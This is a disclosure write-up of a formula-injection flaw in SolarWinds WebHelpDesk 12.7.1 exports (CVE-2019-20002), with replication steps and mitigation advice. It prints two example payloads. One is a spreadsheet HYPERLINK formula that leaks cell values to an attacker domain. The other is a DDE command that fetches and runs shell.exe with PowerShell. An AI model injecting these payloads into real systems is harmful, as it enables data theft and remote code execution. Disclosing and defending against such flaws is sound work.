Formula Injection Vulnerability on SolarWinds WebHelpDesk 12.7.1
What is the vulnerability?
Formula Injection occurs when untrusted input is embedded within TSV/CSV files which could be interpreted by the spreadsheet application as formulas to be computed.
This issue has been assigned CVE-2019–20002.
What is the security impact?
An attacker can use this vulnerability to create malicious payloads in the vulnerable field, when exported by user in CSV format, this can cause the user to be tricked into visiting malicious hyperlinks, executing commands etc.
For eg:
Payload 1: =HYPERLINK(“https://www.attacker.com?leak="&A2&B2,"Error: Click here for additional information”)
This payload plays on the trust relationship that a victim will have with the server and the content provided by it. Once this payload has been placed, the attacker just has to wait for their victim to take the bait. When the victim downloads and opens the file, they will see the attacker’s error message and, given that the file came from a trusted source, will likely click on the cell to investigate the error:
Once the victim clicks on the link, their browser will open and submit a request to the attacker’s domain along with the exfiltrated values from the specified cells.
Payload 2: =cmd|’/C powershell IEX(wget attacker_server/shell.exe)’!A0
This payload will cause a malicious file to be downloaded from attackers server using powershell and executed.
Replication Steps:
1. Create a new ticket as a user.
2. Fill in the ticket details.
3. In one of the text fields(e.g. Subject) enter a malicious payload.
4. Log in as admin user and view the tickets in Queue
5. Export tickets in Excel TSV format.
6. Open the downloaded file and click on the cell
6. You will be taken to the link in the malicious hyperlink.
Proof of Concept:
Fig 1. Create a ticket as a user, and put malicious payload in Subject field
Fig 2. Admin user views tickets in his queue
Fig 3. Admin user downloads ticket details in TSV format
Fig 4. Admin user opens exported TSV file
Fig 5. On clicking the cell, the unsuspecting user will be taken to malicious website.
Recommendations:
Preventing this attack is as simple as blocking a few key characters. All formulas require one of four special characters, and if you prevent these than you mitigate this vulnerability:
Equals to (=)
Plus (+)
Minus (-)
At (@)
These characters can either be sanitized or the server can check the content of the uploaded file before allowing it to be uploaded, rejecting any file containing the disallowed characters. This can help ensure the attacker’s payload will never get successfully delivered.
Note: The vulnerability has been fixed with latest product release of Web Help Desk 12.7.2 which was made publicly available on April 14, 2020.
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
